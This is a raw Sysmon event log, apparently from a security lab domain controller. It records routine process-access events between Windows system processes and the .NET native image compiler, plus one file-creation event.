13:25:36.071{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D203-000000009A01}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.056{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D203-000000009A01}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.056{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D203-000000009A01}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.993{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-D103-000000009A01}1292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.259{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4651-6000-E003-000000009A01}4124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.243{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4651-6000-E003-000000009A01}4124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.243{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4651-6000-E003-000000009A01}4124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.134{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4651-6000-DF03-000000009A01}5024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.118{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4651-6000-DF03-000000009A01}5024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.118{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4651-6000-DF03-000000009A01}5024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.071{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4651-6000-DE03-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.056{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4651-6000-DE03-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.056{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4651-6000-DE03-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:37.009{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-DD03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.993{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4650-6000-DD03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.853{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4652-6000-E503-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.837{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4652-6000-E503-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.837{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4652-6000-E503-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.665{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4652-6000-E403-000000009A01}4384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.649{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4652-6000-E403-000000009A01}4384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.649{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4652-6000-E403-000000009A01}4384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.446{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4652-6000-E303-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.431{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4652-6000-E303-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:38.431{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4652-6000-E303-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:38.368{08A6967A-4652-6000-E203-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\890-0\Microsoft.Transactions.Bridge.Dtc.dll2021-01-14 